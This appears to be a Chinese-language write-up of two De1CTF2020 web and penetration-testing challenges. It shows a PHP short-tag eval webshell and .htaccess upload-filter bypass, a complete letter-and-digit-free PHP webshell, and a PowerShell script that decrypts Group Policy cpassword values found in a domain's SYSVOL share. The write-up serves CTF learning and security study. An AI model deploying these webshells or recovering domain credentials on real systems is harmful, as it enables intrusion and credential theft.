De1CTF2020

check in

考点：文件上传过滤ph，短标签命令执行绕过，.htaccess攻击

知识点：<?=和<? echo等价，从PHP5.4.0后起<?=总是可用的

<?=eval($_POST[‘cmd’]);相当于<? echo eval($_POST[‘cmd’]);

抓包，随便上传了个马，发现存在内容黑名单

过滤了ph，尝试用短标签绕过本地测试了下，这样的短标签可以执行任意系统命令，system也可以

于是我们去选择构造如下的payload上传，让他直接执行命令 ，其中注意.htaccess中的php部分用换行绕过，同时修改Content-Type类型

最后访问得到flag

如果要getshell可以蚁剑连接的话上传<?=eval($_POST[‘cmd’]);

Hard_Pentest_1

考点： 短标签+无字母数字webshell+内网渗透

打开题目的源码如下：

<?php
//Clear the uploads directory every hour
highlight_file(__FILE__);
$sandbox = "uploads/". md5("De1CTF2020".$_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);

if($_POST["submit"]){
    if (($_FILES["file"]["size"] < 2048) && Check()){
        if ($_FILES["file"]["error"] > 0){
            die($_FILES["file"]["error"]);
        }
        else{
            $filename=md5($_SERVER['REMOTE_ADDR'])."_".$_FILES["file"]["name"];
            move_uploaded_file($_FILES["file"]["tmp_name"], $filename);
            echo "save in:" . $sandbox."/" . $filename;
        }
    }
    else{
        echo "Not Allow!";
    }
}

function Check(){
    $BlackExts = array("php");
    $ext = explode(".", $_FILES["file"]["name"]);
    $exts = trim(end($ext));
    $file_content = file_get_contents($_FILES["file"]["tmp_name"]);

    if(!preg_match('/[a-z0-9;~^`&|]/is',$file_content)  && 
        !in_array($exts, $BlackExts) && 
        !preg_match('/\.\./',$_FILES["file"]["name"])) {
          return true;
    }
    return false;
}
?>

<html>
<head>
<meta charset="utf-8">
<title>upload</title>
</head>
<body>

<form action="index.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="submit">
</form>

</body>
</html>

代码过滤很简单：不允许php后缀，且文件内容不能存在数字和字母,php大小写就绕过了，无数字字母的webshell构造参看https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

<?=$_=[]?>
<?=$_=@"$_"?>
<?=$_=$_['!'=='@']?> 
<?=$___=$_?>
<?=$__=$_?>
<?=$__++?>
<?=$__++?>
<?=$__++?>
<?=$__++?>
<?=$__++?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?= $___.=$__?>
<?= $__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $___.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $___.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $___.=$__?>
<?=$____='_'?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?=$____.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $____.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $____.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $____.=$__?>
<?= $_=$$____?>
<?= $_[__]($_[_],$_[___])?>

上面这个脚本请仔细研究，很好理解。最后访问得到的路径去写一个马

蚁剑连接后发现是Windows环境，找到一个压缩包，导出，发现需要密码

根据提示继续进行内网渗透，查到域控192.168.0.12，该机器为192.168.0.11并属于De1CTF2020.lab域中

输入net use查看域中的共享连接

接下来参看大佬的Writeup学习到域渗透中SYSVOL还原组策略中保存的密码方法

参看：https://3gstudent.github.io/3gstudent.github.io

首先在每个域内都有一个共享的文件夹SYSVOL，路径为：\\<donain>\SYSVOL\，所有域内主机都能访问，里面保存组策略相关数据。因此进入该域中的共享文件夹

然后需要找到相应的策略组id的配置文件，路径为：//De1CTF2020.lab/SYSVOL/De1CTF2020.lab/Policies/{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}/Machine/Preferences/Groups/，如下是配置文件Groups.xml的内容

其中cpassword为AES加密的密码，有现成的解密脚本，改一下密码即可

function Get-DecryptedCpassword {
    [CmdletBinding()]
    Param(
        [string]$Cpassword
    )
    try{
    # Append appropriate padding based on string Length
    $Mod=($Cpassword.length % 4)
    
    switch($Mod){
    '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length-1)}
    '2' {$Cpassword += ('='*(4-$Mod))}
    '3' {$Cpassword += ('='*(4-$Mod))}
    }
    
    $Base64Decoded=[Convert]::FromBase64String($Cpassword)
    #Create a new AES.NET Crypto Object
    $AesObject=New-Object System.Security.Cryptography.AesCryptoServiceProvider
    [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
    
    #Set IV to all nulls to prevent dynamic generation of IV value
    $AesIV = New-Object Byte[]($Aesobject.IV.Length)
    $AesObject.IV=$AesIV
    $AesObject.Key=$Aeskey
    $DecryptorObject=$Aesobject.CreateDecryptor()
    [Byte[]] $OutBlock=$DecryptorObject.TransformFinalBlock($Base64Decoded,0,$Base64Decoded.length)
    
    return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
    }
    
    catch {Write-Error $Error[0]}
}
Get-DecryptedCpassword "uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08"//对应密文

保存为1.ps1上传，在虚拟终端运行：powershell -executionpolicy bypass -file 1.ps1,得到压缩包密码，打开得到flag1